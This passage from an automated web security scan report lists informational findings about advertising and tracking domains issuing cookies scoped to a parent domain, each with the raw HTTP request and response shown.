Set-Cookie: sglst=2280sbpelkxlm5000000043l040k04504dsnlkxlm5000000043l040k04504arllkxlm5000000043l040k04504cg5lkxlm5000000043l040k045049rslkkpke0cw1r00m3l050k0550mam5lkkxr8002zw00f3l050k0550fcd4lkxlm5000000043l040k04504crglkxlm5000000043l040k04504cnolkxlm5000000043l040k04504abelkxlm5000000043l040k04504dd8lkxlm5000000043l040k04504cy2lkxlm5000000043l040k04504aoplkb5u209jqc0063e000j00500cnxlkxlm5000000043l040k04504bq3lkxlm5000000043l040k04504bvplkxlm5000000043l040k04504aoilkxlm5000000043l040k04504942lkb5u20mfs300o3l000k005008ndlkb5u20mfs300o3l000k005009ullkxlm5000000043l040k04504bvclkxlm5000000043l040k04504c5flkxlm5000000043l040k0450456blkb5u20mfs300o3l000k00500bjqlkxlm5000000043l040k04504awklkxlm5000000043l040k04504asulkb5u209jqc0063e000j00500crplkxlm5000000043l040k04504asqlkxlm5000000043l040k04504c5rlkov6e000000073l050k05507aw8lkxlm5000000043l040k04504c60lkxlm5000000043l040k04504dc4lkxlm5000000043l040k04504d26lkxlm5000000043l040k04504dnjlkxlm5000000043l040k04504brilkxlm5000000043l040k04504cbclkxlm5000000043l040k04504c85lkxlm5000000043l040k04504csslkxlm5000000043l040k04504c80lkb5u209jqc0063e000j00500ag2lkd7nq0kib500r3l050k0550oc1elkxlm5000000043l040k04504c81lkkpke0cw1r00i3l000k005009grlkxlm5000000043l040k04504c8flkxlm5000000043l040k04504a6slkkpke0cw1r00i3l000k00500dnalkxlm5000000043l040k045049z6lkxlm5000000043l040k04504dbtlkxlm5000000043l040k04504dyllkxlm5000000043l040k045040kllklhm40c4010053l000k005009q4lkxlm5000000043l040k045049q5lkb5u20mfs300o3l000k00500b3zlkxlm5000000043l040k045040t7ljyxb40ysnr00z3l050k0550odgflkkpke0cw1r00m3l050k0550m9mjlkxlm5000000043l040k04504bo0lkb5u20mfs300s3l050k0550obo1lkkyy00cmo50093l000k005009pglkxlm5000000043l040k04504cwalkxlm5000000043l040k04504d86lklhm40c4010053l000k00500d84lkxlm5000000043l040k04504dqllkxlm5000000043l040k04504dz3lkxlm5000000043l040k04504cm6lkxlm5000000043l040k04504cxdlkxlm5000000043l040k04504719lkb5u20mfs300a3l040k0450571alkkpke0cw1r00i3l000k00500ctplkxlm5000000043l040k04504cc3lkxlm5000000043l040k04504dgilkb5u209jqc0063e000j00500cthlkxlm5000000043l040k045044wclkb5u20mfs300a3l040k045058eklkkpke0cw1r00i3l000k005005mrlkb5u20mfs300o3l000k00500a0ulkxlm5000000043l040k04504arilkxlm5000000043l040k04504bwjlkkyy00cmo500d3l050k0550dcbplkxlm5000000043l040k045049gelkxlm5000000043l040k04504; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 15:35:19 GMT; Path=/
Set-Cookie: vstcnt=417k010r154exp6103210e24tc6l103210e249v4u10pj10e24ru4y103210722te10tq10a24f69z103210f24tmhw103210924n86o103210d24pq44103210a24eflo218e104203210724na8i103210e24eyja103210e24mqca103210e24nsyl103210f24jxig103210f24f9wk103210i24fvio218e20e20f203210f24uzpw118e10f24l16a118e10f24fz24103210924e8bw103210824fsuv103210924fduc218e10a203210e24uzdp103210b24dret103210724gqhl103210923sti21hj10a203210e24cnyl103210g24styu10321092451gt10pj10e24fj52103210924o2lt103210a24nnav103210f24m1v2103210a24f7qr218e108203210924uzg6218e100203210024fgv9218e108203210a24tfmw103210b24hqyp103210i24kd6k103210c23l4f103210a2; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 15:35:19 GMT; Path=/
Location: http://www.googleadservices.com/pagead/conversion/1030881291/?label=l3pmCL-AvwIQi4DI6wM&amp;guid=ON&amp;script=0
Content-Length: 0
Date: Mon, 09 May 2011 15:35:19 GMT


10.33. http://odb.outbrain.com/utils/get  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/get?url=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&settings=true&recs=true&widgetJSId=NA&key=AYQHSUWJ8576&idx=0&version=37740&ref=&apv=false&rand=0.639346786076203&sig=d HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tick=1304954969218; _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJurT0dWeqNOpcg=="; _lvd2=27vfag1ZPzfDGaK+UsDEF+7sgWSAHBie; _rcc2="c5YqA63GvjSl+Ov6ordflA=="; obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Thu, 03-May-2012 15:36:48 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1304955408827; Domain=.outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJurT0dWeqNOpcg=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 15:36:48 GMT; Path=/
Set-Cookie: _lvd2=27vfag1ZPzfDGaK+UsDEF+7sgWSAHBie; Domain=outbrain.com; Expires=Mon, 16-May-2011 04:24:48 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 15:36:48 GMT; Path=/
Set-Cookie: recs-8277e0910d750195b448797616e091ad="0Md6VLP4uVjlx5iB105rBFRGss1g9D1+UIrDZa62H8d9q/U+7rfsSHzfTAzVZtzvGFOIAx+Zi6c="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Mon, 09-May-2011 15:41:48 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:48 GMT
Content-Length: 5487

outbrain_rater.returnedOdbData({'response':{'exec_time':15,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'203024277','req_id':'cfa057c0cd3cd3e521294623f49f9d62'},'score':{'preferred
...[SNIP]...

10.34. http://odb.outbrain.com/utils/get  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/get?url=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&settings=true&recs=true&widgetJSId=NA&key=AYQHSUWJ8576&idx=0&version=37740&ref=&apv=false&rand=0.4678053397219628&sig=li HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tick=1304954969218; _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJurT0dWeqNOpcg=="; _lvd2=27vfag1ZPzfDGaK+UsDEF+7sgWSAHBie; _rcc2="c5YqA63GvjSl+Ov6ordflA=="; obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Thu, 03-May-2012 15:36:56 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1304955416503; Domain=.outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJurT0dWeqNOpcg=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 15:36:56 GMT; Path=/
Set-Cookie: _lvd2=27vfag1ZPzfDGaK+UsDEF+7sgWSAHBie; Domain=outbrain.com; Expires=Mon, 16-May-2011 04:24:56 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 15:36:56 GMT; Path=/
Set-Cookie: recs-d70c1e5d44de8a9150eb91ecff563578="yoz9obW/2XhfIb4e31QLF+S7Xa4bySS399HA3bzA01t8TBqoY5+CsuLi96Cxd+UejaFla9pteKU="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Mon, 09-May-2011 15:41:56 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:56 GMT
Content-Length: 5444

outbrain_rater.returnedOdbData({'response':{'exec_time':17,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'203024277','req_id':'ee2d80d8f79db75191b6df986070973c'},'score':{'preferred
...[SNIP]...

10.35. http://odb.outbrain.com/utils/ping.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/ping.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ping.html?random=0.5672100060619414 HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; tick=1304954969218; _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJurT0dWeqNOpcg=="; _lvd2=27vfag1ZPzfDGaK+UsDEF+7sgWSAHBie; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Thu, 03-May-2012 15:36:48 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Accept-Ranges: bytes
ETag: W/"158-1304265382000"
Last-Modified: Sun, 01 May 2011 15:56:22 GMT
Content-Type: text/html
Content-Length: 158
Date: Mon, 09 May 2011 15:36:48 GMT

<html>
   <head>
       <META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
       <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
   </head>
   <body>
   </body>
</html>

10.36. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7108-2.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4462/5032/7108-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses15=13549^1&13264^1&12590^2; csi15=3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; cd=false; ruid=154dab7990adc1d6f3372c12^10^1304954976^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=12590^2&13549^1&5032^2; csi2=3164882.js^1^1304954981^1304954981&3186629.js^1^1304954976^1304954976&3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:57 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Mon, 09-May-2011 16:36:57 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 16:36:57 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^2&13549^1&5032^3; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=58982; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3187892.js^1^1304955417^1304955417&3164882.js^1^1304954981^1304954981&3186629.js^1^1304954976^1304954976&3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680; expires=Mon, 16-May-2011 15:36:57 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Via: CN-5000
Proxy-Connection: Keep-Alive
Content-Length: 1535

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<script type="text/javascript">
rubicon_cb = Math.random(); rubicon_rurl = docum
...[SNIP]...

10.37. http://pix04.revsci.net/D08734/a1/0/3/0.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/3/0.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/3/0.js?D=DM_LOC%3Dhttp%253A%252F%252Fti.com%253Fscore%253D000%2526zip%253D%2526byear1%253D%2526sex1%253D%2526ts1%253D%2526byear2%253D%2526sex2%253D%2526ts2%253D HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39CEJZjpv597JwPKJxC5gZVtCsylMowZVqFba93uE88QpuDb5ZC9UQMpBwKgJsgsK/5y/VyTHjCWG4SoGRm5dWoFU7PHkVBVRsmPo8ulpSziaGfT5EodlaMm+vF2r3l/c95LrsITXHJ2I1zqJbIwuKe5PN2KgWbN8mNcvi/u7eq2U+HGkHowc+nxezhSslqi3VLe86ut3/CbD7ii3elUpunmujKWIZxPJ9ltUcyTIwhrqdTnfK90aiYPaKzaUqqi1CDohU8VolCkQ/PbXsT0D64lEj1zTEx0fYZK083py+2GEeADpri0HRNaxF300KQuDjQ6yz58+/gEwpcHSlXrUjeL+Q+A2KWMxSaXE3vLUGnK762eDMdGneRi4Z5R/PDaDROL3MikWyJfZq3hJmDPIcsKjZ7WKze1UFa9+VR6Daqv9+IX/j69KWQiiGHN62ZLnTvJDkw/+LGzEdm+xrncZe/MTLl/tzGbC6OZ0xyhOwOxLvpW4OEBvo1vFPZqQ8/4dUIZ9c/tMlDDqcpEk6cZrfGczZNcJ07uJ6oe4iZsjKWewFYiQsK/rbrMrdrfQ/1Su1smIgKxV/Y7oSQzXAjnycWIGfDTAndbGihpi8nFzveXcTFNP5ap414bqma34KoXwzYOq2sc7L4a4qOCmcRiLxjHOc0PPPoNmxhfMWndLuIWTqiOZ4fC0D3IIa7verqW/TDSuCVZ4/orK2q93e17LqkrpOdscw4BbMow6IH7X1OwrXgdjH2/vC9ieEfItiNwQm/uKzk/rnEcVobls6XLls68BM8P9BLC9CTJ6FW1a2w9AOYL2XuoVlnxrjqQPEq4TJtb4mppTU9JrmC9dDEMVwLVNX2aP+Qizf0csOzMy1yU7/fW8h2V1Fh2MeGTjho24iDQqgz4BHQnU7cajGik/56FuARVHL/klg+jUrgSyRsWErWs4tagMBICsdSAiN4tHzJKNsWD1RNYyM2mz7OtgN34QjNO13raQh9KK+UWgc5rtxG0dJuMCoIB4X/hheL8GjEwr+reg/R3m7iuStF0nM5KEJf8qN3Jd3KNrW29NASW0ZNG8TRP3WpdNC1EXEgHYHAjK5b8qNIxRpUqD7btnu/7mzW1a5L/HqPfjtu2qmBWPXPU0k8BdOhAlQGKzABVcTeH7d4Na8CZMdKgNzi52xXhAHqzGYP6Jv3XrXlkJmmp8JzGb+Gmv13RIc2KjMZHqcXB+aXLsPdbwjNmb9lJ2+oUGpQZgH12jfK8uKuHOnVxIzQbugywkDX47CIxRV5y+bCwKY89nBay4+AXw/XyremaQ19e7j9A65Xeqz8nK6eezLWs2STWqnAYxnLskLHMzo52qf22tCqcGXq7CGYNR5tfPHBaQhbi8L0bj1ToQM3w0EEhFavgGW8SLtdUODbZFMwPPZ9LSkHDkpM0wf0Hxef3U9E+m2XvWGHg3cU92f5el+wGICUvGb+KsKCaxvvG7KIz2Thse+5WRvmy6IkCYwqk9KHBsTqashxrqRTPDf+cLSf8Y3dw=; rsiPus_GcbX="MLsXrqEO5ihr4JB0esFCP3iNF+pqmr69ENWrChMuiN+dmZss5tWSaGYzfZrs4FkB8vHaExBOdq4FjNOXBUu39W/3K2EuxA2rLiiq5uEzbhBp2qqHLka+ldHHpySEQN7Ig6ZX2s1Xts6k3/V+F1BVNaX7P2AMt0j6s7SVkIqtY6fBmuqDg3HiDPDRsFu8LYGpdAgFuZrn7788WLSfiPN4FcsWpCManqMes4eDphzgluz0J7T/7NL09GWQZKgq0h2UqnrAalLP4GpQ2z6NoJmqhjf8ll+bI1mb+2NJpMp3lsbhQW6smYNRkIcBnGSsjC6V8lHV22qN0wsd7pUjrGcn2MZyDk4pHLi3HPlqzfwOFLKkUZX5pylobtQ4XT7CPkVynIhqs2Jdqx6Qbv+DVlcJEcLKaGs26CcQXDhIjPrjQmHNTw104A6YB2yPj9aadbsR9G2g+Sx1IMWC03cSleVUYqmsonOsNwBq4IYZ0iEAxN1kj79GMm/TFvViob6tBGl9piggG1ojpl++EI4CZ/DO72bnJ5uiK6A+hD9jowvMcmzWV7pm2A+BZXOctz9mBcFlA1NhVrVlT54nZulBkGghmR6LfWnx7wRhTDuJYLIL9CjgkLULZ5OwAnDvGtd8c9/IcoSF7rvvCCwxXrXbNkbJA5UJXZiQQ32aGD42CB8j4Uuicv5NhrCu90msLuL0yXPFEkF+ghJXl4UoCPpQReyKPwLxU7P8scUESOUmDQbJ26zmYoM5EYK5HRM13xlFLDjmN3gr3gzLy3PBXRfK/0inM3mgODaJYIQsP4tG3dxQXtc5BzlJZExi106qBh3X8ZgtVrG+Lsw/MFccxeVYnXDkPkatfVNHemuSBEnlJdlwJ7HaraMYTm4mdXxBXuNRVT1qtXz/N4fX76mCnHZapZ8HwTns8rRrVf85AMpSS1M+G68+RoH70ohcdXqH83XdOwulC23J/LnyGSVNe7uFY075AoD/k5/OVIoNr6nsjen9TP6PMT4mikP8tgoCsDB1P2MYAQIhWsgnQghE6D5W6j3EAllSXGbQxYfklk9PQ5HF/mqinW6N2HQc"; rsi_us_1000000="pUMVIzlHMAYY1A3HkAz1jyt3tlSj9WvRyFxc7CYdMac7y9zNu2VAbbuAi9eNwCUC8Wl4wOOguOEurHKK5ymr+WMVxLrjQRwI/BIpxOPADBg2yufgfgLgTu5j4fLTEQPVeuiSCftktrpjidSb3tKRT16/qhDddfs4YO14yGwo3mknI3Zsage7Hp/us89s/r8sHOwuTFP/CGJvF0CBpAcFUrFpcSeddZugAt2/rJIEsl5lFIWoWu0NxYgUpdu1epUcSWwK6nXWutDM3kjbS6MwxlDUEHsfiC/tX/ajBDdyf6FoclGT9hYvZ6yHELxTGV52+gM/KNJ7HFfCnqBSHyO9h6K2IG72DZG1gnriBn20N4unmsPk3dyDXHODxND8UIYEdTEJhqUeX0XH8ufbk9oKEcwKphMNOSzMjsdEazx5OG/X/voubSxcMfLggv+AZDDDoXbGHiM/jsG6UCatRfU6qwA/nFJ2HLM4H6Vwy6n5QW6iEtTBjhACVrgjSJ1n0sxNueMqqowm9U9MjFONHQUR6SKVk9owlMGLCJ812+Zr34276nVTgfXxsLZ0YiftaKJuIZ0xP8YY9WkMkt9n8RFkDTls6k1BC7v58lSYgZALXT+bKUXFsuSpAsJNWsLmyWs+XDUQmVb0hR/fcPrwgVJhI4ZuwOsX3RWEdg83luatgZ5+TKYM1It/I+VexFONR38x4qDP9iS3Y7dK1r0pZRdkAEwT968QaKX4dePJx+FsOolAvtn/m15h6VbBjCGtzXDFJsq0asZ+2cixyyycOZ0q9ZO0pv1gaqV+NlgOEwszeFk1G7zGPKs7Hn4CRU8RwJ3PC192d/zQh845eP57+B+obaWwyCioHG3FOYiiZ8MJGnrYDWOTh6FFkJ/lnooujf2FtYlU9jKpfaACfJAKJrmg0lUhzCxs3khsT9cbaSuhk/AIXUky6y/7/4/TdCE/G9rDhkcJMYJhTogOtss3qAESQMf2AR/2GXUB9mpl5kBSpRkjsPnWAmqvOIHRkFGc7ucL8rPj3ymJwl+PX2ItsAHmMq2EnmNyakB+vuFAuT9h5l25oI1IwUVAVoafxDxIVvNI3J0B6g0A1HzsmnY5z077NnItIJh3xRNWe/iXIU+CrYWmkPOTjLSuO4lfoF4riXFUJbckXujjUDMTlq5PEpGKQnlA56Zfg9qW912fdgXl6AA2hOYwMsuwUbGDBMFhQ6XfL09iRogg1WfYzxZ2Np6PvGSDERHaUwP8t0euXTq2Q3eSJ4ppXnS6iCAnGFPbCsrGjyRLOmYtFL2Im/UUecMgAjO9mIZcYqqjLobxUzRXN7iqDqCwIOmEyWQ0dYPcKR9laCXq+0nRJKCUAJQnStj+/JYwWMQHmQKF2Ca/hmc4+baAz6xM2NKxfNlISgW/KhdUaqQ38MUa0a1KSbc9v0K8egn0NfsoKiOYm7vbWfw20dVvNkxG4pyhchNYi+IfuzopLXmexn1k8T0TEIckb31ULLX5aO+Lk6yh9ODYCQQrLrxanBsN1+8zTf3vg5v7l3gwefT81PMYeXwyan8ecHtrQGmGtzs3pQzd"; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUP148mheQIMp6aIYFMFhpiBTp0ewycLkSMn2XM56x7k86fOUiLBQqeJuRU19v0kP9hCu7ltr4Q0pDR2sjqSKwTn94cFOMB5DZyKe6g0kN+uerbnSHQDBGqiEiZNBpF4U+GyTeR2tmSJEi+FG92cKAmsHJkliACoYEQmcB3FM/F12NCBHdiUmDq+7dUCekotGUVfajS7GgYLiS0YaTUV9RCh+cM+phBpeG46dYS4jD+Zgk0L6B3st2y3FqJfPdpuu+bJjQg7U9xVDcMu/+ikerESRO28KZ5NocRAzbIwG+0KntS05C5h3MEypsuz3vovc43LO37Uov2xZejynpV3SDQqL6DaCPm1LY4D7GX6jqSqaIXoBJgU0na+nSYs0M1OmqeaeF1dZdx2Odgg8B5LwM5nFkQ4730ZKzbtbNlxdDh7gdQ1qu3WjtT8nQo4KUPGpAQqz2kqbA8gmcFmfYb6eRTyTE3syc6JZEbc6XR8JY3jCuu6F807ErRBgxnDLKK/eiPAL43DYXst10tKNAc/EyQ9o/YdIxf0Ms4J8/+4qEmT7cIpyYYWZc6jxz6dT3qsMif5xRpHmT/jvyRzKfu4UJ++fl0=; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; rtc_4-db=MLvn9jM1Jgpr54aeixlPU0iJzD/A1gw/s7z5FPHjTbcjQe6SyjZfNBHlcl0kJ6xb7KxXS0n/wkRC4loA/0F2wkRHZcOAJEq4Dwzt2Om/1LFFe33wUlIYHWgk3JIf+57YTIrZsByUWltzFrRLWQkJwcRM8WAjEeY4ROXqVRqWqlFCk3HzeZvB7UqDKiMm+em65LEdFCubQva+uhYCU4TAdQsM9NhX+ug+P8ELz2+3GiBBzM1wCymg8+GPH7Y69+xviE6Hqdz7ujIwlbK5VxRJUDXsPScW0OuLen2n5XNIVQWV0a6zZscEKSvJFJ+qcEq4+Z9S+ATaANDLtiqSIrA0MATfpgfCqefcfJ5CLtyChbBOQcNQdYq/ZTXHQ2nKTygG5ksEGSLhhMLTH3nLtfSmf7myMaOLY9aJ02OHl/Fu6Y2wQS84P004/LHAfRc/BEHwKgDZY8E4JJEL71uMwA2eeEdPVYKPG/DduFctll24uU8j2YMNsWENRh4hK5IbB0czI2gWw5thigBcBZIP3XJrVHNnhsObnvvXwCKWWfWdYI3v4TRgyMWKw6d8zcNUriJHuzJ6gN4inlSjVhNBgUR06cCYuTzRv8kU21/Nb5c0ZNbuKLudEWUgq1+Mw5po5VTwWXV0xjFGISH481xxkQrS9f+z4zfknHQSyR966h01FYMsS7zsQtcKlrarNO/PXZK/VVXoeRIalnaoFkvriwrBt9uojqEElV6GOWaCOj9t8u2MX6+ewAiFR8qEF4hCb